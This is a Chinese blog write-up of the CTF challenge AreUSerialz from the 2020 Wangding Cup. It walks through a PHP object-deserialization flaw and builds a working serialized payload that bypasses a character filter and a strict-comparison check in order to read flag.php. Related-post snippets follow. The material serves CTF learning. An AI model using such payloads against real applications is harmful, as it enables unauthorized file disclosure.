[网鼎杯 2020 青龙组]AreUSerialz Writeup (超详细)

最新推荐文章于 2025-08-04 23:39:06 发布
最新推荐文章于 2025-08-04 23:39:06 发布
阅读量151 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64751732/article/details/148483173

如下为题目源码

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

通过分析如下代码:

传入的参数名: str, str为需要进行反序列的字符串,同时对字符串存在过滤操作。由于protected 属性的成员变量在进行序列化时会存在%00 和* 等 ASCII 值小于 32,因此只能通过修改属性为 public 进行绕过,这是PHP7.1+ 对成员变量属性解析不敏感导致的。

为什么需要绕过

public属性序列化的时候格式是正常成员名

private属性序列化的时候格式是%00类名%00成员名

protect属性序列化的时候格式是%00*%00成员名

如下是序列化后为了区分成员变量属性添加的额外字符

<?php
class Test
{
    public $sex = "man";
    private $name = "mario";
    protected $age = "18";
}

$t=new Test();
print_r(serialize($t));

通过查看数据包,发现php版本符合绕过条件

分析函数调用过程

unserialize -> __destruct -> process -> read

同时设置 op =2 filename=flag.php 

同时注意到由于执行unserialize 时不会调用__construct,但结束时会调用__destruct 方法。

__destruct 方法会将字符 op==="2"改变为 op="1",同时发现此时是强等于,必须类型也为字符型才行,如果 将op 设置为数字型 2,就不会被替换

<?php
  $a = 2;


var_dump($a === "2");
var_dump($a == "2");

//bool(false)
//bool(true)

 删除不必要的代码,然后对成员变量进行序列化

<?php
class FileHandler {

    public $op=2;
    public $filename="flag.php";
    public $content;

}

$obj = new FileHandler();
echo serialize($obj);

?>
//输出 O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

查看网页源码得到flag 

2021-03-10-PHP代码审计题
qq_50963064的博客
11-15 1208
PHP代码审计题 由于重点是代码审计,所以直接看代码了。 [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { //设置白名单 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
2020--青龙-Web-AreUSerialz
aheyor的博客
10-31 957
这个题目不仅考察了对PHP反序列化的理解,还考察了代码审计和安全漏洞分析的能力。解决这个题目通常需要深入理解PHP的魔术方法和反序列化的原理,以及如何利用这些知识来绕过安全检查和执行非授权的操作。在解决这个题目时,关键在于理解反序列化的过程以及如何利用这个过程中可能存在的漏洞。参与者需要分析代码,找到反序列化的点,并利用这个点来执行某些操作,如读取敏感文件或执行系统命令。在这个题目中,参与者需要分析并解决一个涉及PHP反序列化漏洞的问题。类,其中包括几个关键的方法和属性。方法用于初始化类的属性,
web:[ 2020 青龙]AreUSerialz
sleepywin的博客
10-30 3757
这里有__destruct()函数,在对象销毁时自动调用,根据$op属性的值进行一些操作,并重置属性的值,后再次调用process()方法,同时该函数会根据op变量值的不同,会相应调用读写函数。总体解题思路为,构造反序列化给str变量,当主函数进行反序列化时,调用了FileHandler类,读取flag.php。接收到名为str的get参数,参数会被反序列化,并创建一个对象,在反序列化之前,会使用。2.php的序列化字符串中只要把其中的s改成大写的S,后面的字符串就可以用十六进制表示。
[ 2020 青龙]AreUSerialz
pakho_C的博客
02-09 1093
web第28题 [ 2020 青龙]AreUSerialz 打开靶场直接给出源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filen
2020php反序列化,2020-(青龙)_Web题目 AreUserialz Writeup
weixin_39942992的博客
04-15 273
0x02 AreUSerialz关于s大写小写问题,可以看p神在圈子里发的,我在最后付上截图考点: php反序列化 php特性 利用链构造1.打开页面得到代码如下:include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;...
2020青龙writeup
st0ut的博客
05-25 898
前言 第一场开始了,又是菜鸡自闭的一天。。。 刚开始一直不放web题,让做web的有点难受呀。 web AreUSerialz 打开题目发现源码,是一个反序列化: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __constr
第 四 周 write up (BJDCTF-2020-Web-Cookie is so subtle! Bugku 蹭先解开密码 [ 2020 青龙]AreUSerialz nmap)
tothemoon的博客
10-15 990
BJDCTF-2020-Web-Cookie is so subtle!(twig,ssti) 先百度 瞎测了一下,居然测出给git泄露了? 跑了下脚本,不是git泄露。 淦 重新开始 在hint下面发现了提示 在flag.php页面登陆后,抓包发现,cookie里面多了变量user。 看了大佬的提示:是模板注入,靠,这怎么想得到啊。菜鸡我是真的涨姿势了。 如果输入{{7*’7’}}如果 输出7777777 则是jinja2模板 如果是 49 则是 twig模板 这里输出了4
第二届(第一场:青龙web WriteUp
a3320315的博客
05-11 2554
学校战队总排名52,web和pwn各拿了一个一血,只能说师傅太强了,不过后来的排名有点起飞,最后半小时,直接从前十名飞出去了~~ filejava 这道题主要考察的是java的xxe漏洞,这个题目总共有两个功能,上传和下载功能,有上传和下载,我们就想到两个漏洞点,是否有任意文件上传或者任意文件下载? 经过测试确实有任意文件下载,但是任意文件上传确不存在,但是却能够为我们提供路径~~ 任意文件下载 但是我们不知道web的路径怎么办?我们还有文件上传的报错~~ 文件上传 我们可以看到报错处直接给了web
[CTF]WriteUp第1篇
poiiuytree233的博客
10-05 845
[MRCTF2020]你传你🐎呢 [ 2020 青龙]AreUSerialz [CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 5万+
buuctf题目的部分writeup,持续更新中
零信任络概念及在网络安全中的应用
都给我的博客
07-31 336
零信任络(Zero Trust Network)是一种颠覆传统边界安全的架构理念,其核心是**“永不信任,始终验证”**(Never Trust, Always Verify)。它假设络内外均存在威胁,需对所有访问请求进行动态验证和最小权限控制。的动态防护机制,在日益复杂的络威胁中构建内生安全能力。零信任不仅是技术升级,更是安全范式的根本变革。
软件测评中站类测评测试使用的BurpSuite-Web安全测试流程
2503_92839163的博客
07-30 604
BurpSuite作为渗透测试核心工具,Burp Suite通过模块化设计实现全流程攻击面覆盖。掌握其高阶工作流可显著提升漏洞挖掘效率。软件测评中站类测评测试使用的BurpSuite-Web安全测试流程
络与信息安全有哪些岗位:(4)应急响应工程师
锦鲤的博客
07-31 1401
本文介绍了络与信息安全领域中的应急响应工程师岗位。该岗位主要负责安全事件全生命周期管理,包括监控预警、应急处置、预案演练和防御升级四大模块。文章详细阐述了应急响应工程师在互联、金融、政府、制造业等不同行业的具体职责和技术要求,指出核心技术能力包括攻击认知、系统分析和取证调查等,同时强调抗压能力、跨部门协作等软技能的重要性。文中还对比了应急响应工程师与渗透测试、安全运维等岗位的区别,提供了职业发展路径建议,并指出该岗位是网络安全体系的最后防线,对企业实现"被动应对到主动防御"的转变具有
融媒体中心网络安全应急预案(通用技术框架)
Liu_Bruce的博客
07-31 1366
本文提出了融媒体中心网络安全应急预案的通用技术框架,围绕播出安全、内容资产保护和系统韧性三大核心目标构建防御体系。方案采用纵深防御架构,涵盖络边界、制作/播出区、终端层和数据层的关键技术件,并建立事件分级响应模型。重点针对勒索攻击等典型场景给出详细处置流程和实用技术脚本(如快速隔离命令、勒索软件检测脚本)。强调3-2-1备份原则和持续改进机制,并特别指出融媒体行业在内容安全、播出连续性和舆情管控方面的特殊要求。最后推荐取证工具、威胁情报源等实用资源,建议通过季度演练、SOAR平台部署等提升应急响应能力。
车载通信架构 ---车内通信的汽车网络安全
最新发布
Soly_kun的博客
08-04 450
汽车网络安全:挑战与创新解决方案 随着汽车智能化发展,现代车辆平均配备70个电子控制单元,通过CAN总线实现互联。然而,传统CAN协议存在严重安全缺陷,如缺乏身份验证机制,易受DoS攻击和恶意入侵。研究表明,攻击者可远程控制刹车、方向盘等关键功能,威胁行车安全。 针对这一挑战,本文提出创新的"控制器局域身份匿名化协议(IA-CAN)",采用两步认证机制:首先通过动态匿名ID过滤发送者真实性,再利用加密消息认证码验证数据有效性。该方案能有效抵御重放攻击和DoS攻击,同时兼容现有CAN架构
网络安全】不安全的反序列化漏洞
Dalik1018的博客
08-04 675
咱先讲讲啥是序列化和反序列化。序列化,就好比把一个完整的玩具(对象)拆成一个个小零件,方便存起来或者寄给别人。反序列化呢,就是收到这些小零件后,再把玩具重新装起来。在编程里,对象要存到文件或者通过络传输,就得先序列化;接收方拿到数据后,再反序列化还原成对象。​但要是这个过程出了岔子,让坏人钻了空子,那可就危险啦!这就是反序列化漏洞 —— 当程序反序列化的数据被恶意操控,就可能引发各种安全灾难。​有些程序员自己写反序列化代码时,要是没考虑周全,也会留下漏洞。​。
Web安全学习步骤
JQLvopkk的博客
08-01 637
Web安全学习步骤
【RH134 问答题】第 11 章 管理网络安全
2301_80182689的博客
07-31 211
防火墙在 Linux 系统中用于,并支持,是保障系统安全的关键件。firewalld 是现代 Linux 发行版中默认的动态防火墙管理工具。它基于(zones)和(services)管理规则,支持动态规则更改、区域管理、服务定义、端口管理和复杂规则配置,用于提高Linux系统的安全性和络连接的可靠性。重新加载服务或重启服务。或。
2024年网络安全预防
JQLvopkk的博客
08-02 324
**趋势方向** | **关键数据** | **影响领域** |- **案例**:Metabase本地文件包含漏洞(CVE-2021-41277)致企业BI数据泄露。- **类型**:本地提权(如CVE-2024-49039)、内核越界写入(CWE-787)。- **SSRF(CWE-918)**:伪造服务器请求访问内资源(如AWS元数据)。- **模式**:污染开源库(如Log4j2)、第三方插件(占数据库攻击的60%)。
2020 YCBCTF羊城官方Writeup:PHP与Web安全解题技巧实录
2020YCBCTF羊城官方Writeup是一份详细的竞赛报告,涵盖了该年度网络安全 Capture The Flag (CTF) 比赛中的一系列挑战,主要集中在Web、PHP、漏洞利用、密码学、以及逆向工程等不同领域。以下是各个部分的主要知识...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值